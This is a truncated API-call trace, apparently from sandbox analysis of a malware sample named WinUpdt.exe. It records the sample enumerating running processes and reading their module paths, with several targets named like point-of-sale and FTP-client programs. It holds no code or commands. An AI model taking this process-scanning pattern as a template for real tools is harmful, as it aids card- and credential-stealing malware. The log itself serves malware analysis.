0x7fa320 [0064.473] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1010000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\centralcreditcard.exe" (normalized: "c:\\program files (x86)\\internet explorer\\centralcreditcard.exe")) returned 0x3e [0064.473] CoTaskMemFree (pv=0x7fa320) [0064.473] CloseHandle (hObject=0x1e4) returned 1 [0064.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.473] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x236b40c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x236b40c, lpcbNeeded=0x39e760) returned 1 [0064.474] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1110000, lpmodinfo=0x236b54c, cb=0xc | out: lpmodinfo=0x236b54c*(lpBaseOfDll=0x1110000, SizeOfImage=0x17000, EntryPoint=0x11114a1)) returned 1 [0064.474] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.474] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1110000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="basename-que.exe") returned 0x10 [0064.474] CoTaskMemFree (pv=0x7fa320) [0064.474] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.475] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1110000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Analysis Services\\basename-que.exe" (normalized: "c:\\program files\\microsoft analysis services\\basename-que.exe")) returned 0x3d [0064.475] CoTaskMemFree (pv=0x7fa320) [0064.475] CloseHandle (hObject=0x1e4) returned 1 [0064.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.475] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x236d858, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x236d858, lpcbNeeded=0x39e760) returned 1 [0064.476] GetModuleInformation (in: hProcess=0x1e4, hModule=0xfa0000, lpmodinfo=0x236d998, cb=0xc | out: lpmodinfo=0x236d998*(lpBaseOfDll=0xfa0000, SizeOfImage=0x17000, EntryPoint=0xfa14a1)) returned 1 [0064.476] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.476] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xfa0000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="flashfxp.exe") returned 0xc [0064.476] CoTaskMemFree (pv=0x7fa320) [0064.476] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0064.476] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xfa0000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\flashfxp.exe" (normalized: "c:\\program files\\reference assemblies\\flashfxp.exe")) returned 0x32 [0064.477] CoTaskMemFree (pv=0x7fa320) [0064.477] CloseHandle (hObject=0x1e4) returned 1 [0064.477] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.477] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x236fc88, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x236fc88, lpcbNeeded=0x39e760) returned 0 [0064.478] CloseHandle (hObject=0x1e0) returned 1 [0064.478] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x1e4 [0064.478] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x236ff18, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x236ff18, lpcbNeeded=0x39e760) returned 1 [0064.479] GetModuleInformation (in: hProcess=0x1e4, hModule=0xbb0000, lpmodinfo=0x2370058, cb=0xc | out: lpmodinfo=0x2370058*(lpBaseOfDll=0xbb0000, SizeOfImage=0x17000, EntryPoint=0xbb14a1)) returned 1 [0064.479] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.479] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xbb0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="far.exe") returned 0x7 [0064.480] CoTaskMemFree (pv=0x7943e0) [0064.480] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.480] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xbb0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\far.exe" (normalized: "c:\\program files\\windows defender\\far.exe")) returned 0x29 [0064.480] CoTaskMemFree (pv=0x7943e0) [0064.480] CloseHandle (hObject=0x1e4) returned 1 [0064.480] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.481] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x290) returned 0x1e4 [0064.481] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2372328, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2372328, lpcbNeeded=0x39e760) returned 1 [0064.482] GetModuleInformation (in: hProcess=0x1e4, hModule=0x13e0000, lpmodinfo=0x2372468, cb=0xc | out: lpmodinfo=0x2372468*(lpBaseOfDll=0x13e0000, SizeOfImage=0x17000, EntryPoint=0x13e14a1)) returned 1 [0064.482] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.482] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x13e0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="administered.exe") returned 0x10 [0064.482] CoTaskMemFree (pv=0x7943e0) [0064.482] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.482] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x13e0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\administered.exe" (normalized: "c:\\program files (x86)\\windows nt\\administered.exe")) returned 0x32 [0064.482] CoTaskMemFree (pv=0x7943e0) [0064.482] CloseHandle (hObject=0x1e4) returned 1 [0064.482] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x1e4 [0064.483] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2374760, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2374760, lpcbNeeded=0x39e760) returned 1 [0064.484] GetModuleInformation (in: hProcess=0x1e4, hModule=0xf20000, lpmodinfo=0x23748a0, cb=0xc | out: lpmodinfo=0x23748a0*(lpBaseOfDll=0xf20000, SizeOfImage=0x17000, EntryPoint=0xf214a1)) returned 1 [0064.484] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.484] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xf20000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="isspos.exe") returned 0xa [0064.484] CoTaskMemFree (pv=0x7943e0) [0064.484] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.484] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xf20000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\isspos.exe" (normalized: "c:\\program files\\windows media player\\isspos.exe")) returned 0x30 [0064.484] CoTaskMemFree (pv=0x7943e0) [0064.484] CloseHandle (hObject=0x1e4) returned 1 [0064.484] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x1e4 [0064.485] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2376b88, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2376b88, lpcbNeeded=0x39e760) returned 0 [0064.485] GetCurrentProcessId () returned 0x8e8 [0064.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.485] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.485] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.486] CloseHandle (hObject=0x1e0) returned 1 [0064.486] CloseHandle (hObject=0x1e4) returned 1 [0064.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x1e4 [0064.486] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2376e18, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2376e18, lpcbNeeded=0x39e760) returned 1 [0064.487] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1350000, lpmodinfo=0x2376f58, cb=0xc | out: lpmodinfo=0x2376f58*(lpBaseOfDll=0x1350000, SizeOfImage=0x17000, EntryPoint=0x13514a1)) returned 1 [0064.487] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.487] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1350000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="icq.exe") returned 0x7 [0064.488] CoTaskMemFree (pv=0x7943e0) [0064.488] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.488] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1350000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\DVD Maker\\icq.exe" (normalized: "c:\\program files\\dvd maker\\icq.exe")) returned 0x22 [0064.488] CoTaskMemFree (pv=0x7943e0) [0064.488] CloseHandle (hObject=0x1e4) returned 1 [0064.488] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x1e4 [0064.488] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x237921c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x237921c, lpcbNeeded=0x39e760) returned 1 [0064.489] GetModuleInformation (in: hProcess=0x1e4, hModule=0x3c0000, lpmodinfo=0x237935c, cb=0xc | out: lpmodinfo=0x237935c*(lpBaseOfDll=0x3c0000, SizeOfImage=0x17000, EntryPoint=0x3c14a1)) returned 1 [0064.489] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.489] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x3c0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="reading-cycles-acquisition.exe") returned 0x1e [0064.490] CoTaskMemFree (pv=0x7943e0) [0064.490] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.490] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x3c0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\reading-cycles-acquisition.exe" (normalized: "c:\\program files\\msbuild\\reading-cycles-acquisition.exe")) returned 0x37 [0064.490] CoTaskMemFree (pv=0x7943e0) [0064.490] CloseHandle (hObject=0x1e4) returned 1 [0064.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.490] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c0) returned 0x1e4 [0064.490] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x237b678, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x237b678, lpcbNeeded=0x39e760) returned 1 [0064.491] GetModuleInformation (in: hProcess=0x1e4, hModule=0x860000, lpmodinfo=0x237b7b8, cb=0xc | out: lpmodinfo=0x237b7b8*(lpBaseOfDll=0x860000, SizeOfImage=0x17000, EntryPoint=0x8614a1)) returned 1 [0064.492] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.492] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x860000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="basisskin.exe") returned 0xd [0064.492] CoTaskMemFree (pv=0x7943e0) [0064.492] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.492] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x860000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\basisskin.exe" (normalized: "c:\\program files\\windows defender\\basisskin.exe")) returned 0x2f [0064.492] CoTaskMemFree (pv=0x7943e0) [0064.492] CloseHandle (hObject=0x1e4) returned 1 [0064.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.492] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x1e4 [0064.492] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x237daa0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x237daa0, lpcbNeeded=0x39e760) returned 1 [0064.493] GetModuleInformation (in: hProcess=0x1e4, hModule=0xcc0000, lpmodinfo=0x237dbe0, cb=0xc | out: lpmodinfo=0x237dbe0*(lpBaseOfDll=0xcc0000, SizeOfImage=0x17000, EntryPoint=0xcc14a1)) returned 1 [0064.494] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.494] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xcc0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="webdrive.exe") returned 0xc [0064.494] CoTaskMemFree (pv=0x7943e0) [0064.494] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.494] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xcc0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\webdrive.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\webdrive.exe")) returned 0x3f [0064.494] CoTaskMemFree (pv=0x7943e0) [0064.494] CloseHandle (hObject=0x1e4) returned 1 [0064.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.494] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e4 [0064.494] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x237fee8, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x237fee8, lpcbNeeded=0x39e760) returned 1 [0064.495] GetModuleInformation (in: hProcess=0x1e4, hModule=0xf20000, lpmodinfo=0x2380028, cb=0xc | out: lpmodinfo=0x2380028*(lpBaseOfDll=0xf20000, SizeOfImage=0x17000, EntryPoint=0xf214a1)) returned 1 [0064.496] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.496] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xf20000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="3dftp.exe") returned 0x9 [0064.496] CoTaskMemFree (pv=0x7943e0) [0064.496] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.496] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xf20000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\3dftp.exe" (normalized: "c:\\program files\\windows journal\\3dftp.exe")) returned 0x2a [0064.497] CoTaskMemFree (pv=0x7943e0) [0064.497] CloseHandle (hObject=0x1e4) returned 1 [0064.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.497] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x1e4 [0064.497] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2382300, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2382300, lpcbNeeded=0x39e760) returned 1 [0064.498] GetModuleInformation (in: hProcess=0x1e4, hModule=0x40000, lpmodinfo=0x2382440, cb=0xc | out: lpmodinfo=0x2382440*(lpBaseOfDll=0x40000, SizeOfImage=0x17000, EntryPoint=0x414a1)) returned 1 [0064.498] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.498] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x40000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="fpos.exe") returned 0x8 [0064.498] CoTaskMemFree (pv=0x7943e0) [0064.498] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.498] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x40000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\fpos.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\fpos.exe")) returned 0x3b [0064.499] CoTaskMemFree (pv=0x7943e0) [0064.499] CloseHandle (hObject=0x1e4) returned 1 [0064.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.499] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e0) returned 0x1e4 [0064.499] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2384738, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2384738, lpcbNeeded=0x39e760) returned 1 [0064.500] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1340000, lpmodinfo=0x2384878, cb=0xc | out: lpmodinfo=0x2384878*(lpBaseOfDll=0x1340000, SizeOfImage=0x17000, EntryPoint=0x13414a1)) returned 1 [0064.500] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.500] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1340000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="symptomssuicidesea.exe") returned 0x16 [0064.500] CoTaskMemFree (pv=0x7943e0) [0064.500] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.500] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1340000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Uninstall Information\\symptomssuicidesea.exe" (normalized: "c:\\program files\\uninstall information\\symptomssuicidesea.exe")) returned 0x3d [0064.501] CoTaskMemFree (pv=0x7943e0) [0064.501] CloseHandle (hObject=0x1e4) returned 1 [0064.501] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.501] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x1e4 [0064.501] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2386b90, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2386b90, lpcbNeeded=0x39e760) returned 1 [0064.502] GetModuleInformation (in: hProcess=0x1e4, hModule=0x900000, lpmodinfo=0x2386cd0, cb=0xc | out: lpmodinfo=0x2386cd0*(lpBaseOfDll=0x900000, SizeOfImage=0x17000, EntryPoint=0x9014a1)) returned 1 [0064.502] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.502] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x900000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="ncftp.exe") returned 0x9 [0064.502] CoTaskMemFree (pv=0x7943e0) [0064.502] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.507] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x900000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\ncftp.exe" (normalized: "c:\\program files\\internet explorer\\ncftp.exe")) returned 0x2c [0064.507] CoTaskMemFree (pv=0x7943e0) [0064.507] CloseHandle (hObject=0x1e4) returned 1 [0064.507] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.507] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e4 [0064.507] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2388fac, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2388fac, lpcbNeeded=0x39e760) returned 0 [0064.508] GetCurrentProcessId () returned 0x8e8 [0064.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.508] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.508] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.509] CloseHandle (hObject=0x1e0) returned 1 [0064.509] CloseHandle (hObject=0x1e4) returned 1 [0064.509] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x1e4 [0064.509] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x238923c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x238923c, lpcbNeeded=0x39e760) returned 0 [0064.509] GetCurrentProcessId () returned 0x8e8 [0064.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.509] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.509] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.510] CloseHandle (hObject=0x1e0) returned 1 [0064.510] CloseHandle (hObject=0x1e4) returned 1 [0064.510] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x1e4 [0064.510] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23894cc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23894cc, lpcbNeeded=0x39e760) returned 0 [0064.510] GetCurrentProcessId () returned 0x8e8 [0064.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.510] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.511] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.511] CloseHandle (hObject=0x1e0) returned 1 [0064.511] CloseHandle (hObject=0x1e4) returned 1 [0064.512] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e4 [0064.512] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x238975c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x238975c, lpcbNeeded=0x39e760) returned 1 [0064.513] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1300000, lpmodinfo=0x238989c, cb=0xc | out: lpmodinfo=0x238989c*(lpBaseOfDll=0x1300000, SizeOfImage=0x17000, EntryPoint=0x13014a1)) returned 1 [0064.513] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.513] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1300000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="multi.exe") returned 0x9 [0064.513] CoTaskMemFree (pv=0x7943e0) [0064.513] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.513] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1300000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\MSBuild\\multi.exe" (normalized: "c:\\program files\\msbuild\\multi.exe")) returned 0x22 [0064.513] CoTaskMemFree (pv=0x7943e0) [0064.513] CloseHandle (hObject=0x1e4) returned 1 [0064.514] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.514] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x1e4 [0064.514] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x238bb64, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x238bb64, lpcbNeeded=0x39e760) returned 1 [0064.515] GetModuleInformation (in: hProcess=0x1e4, hModule=0xac0000, lpmodinfo=0x238bca4, cb=0xc | out: lpmodinfo=0x238bca4*(lpBaseOfDll=0xac0000, SizeOfImage=0x17000, EntryPoint=0xac14a1)) returned 1 [0064.515] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.515] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xac0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="edcsvr.exe") returned 0xa [0064.515] CoTaskMemFree (pv=0x7943e0) [0064.515] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.515] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xac0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\edcsvr.exe" (normalized: "c:\\program files\\windows defender\\edcsvr.exe")) returned 0x2c [0064.516] CoTaskMemFree (pv=0x7943e0) [0064.516] CloseHandle (hObject=0x1e4) returned 1 [0064.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.516] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e4 [0064.516] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x238df84, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x238df84, lpcbNeeded=0x39e760) returned 1 [0064.517] GetModuleInformation (in: hProcess=0x1e4, hModule=0xab0000, lpmodinfo=0x238e0c4, cb=0xc | out: lpmodinfo=0x238e0c4*(lpBaseOfDll=0xab0000, 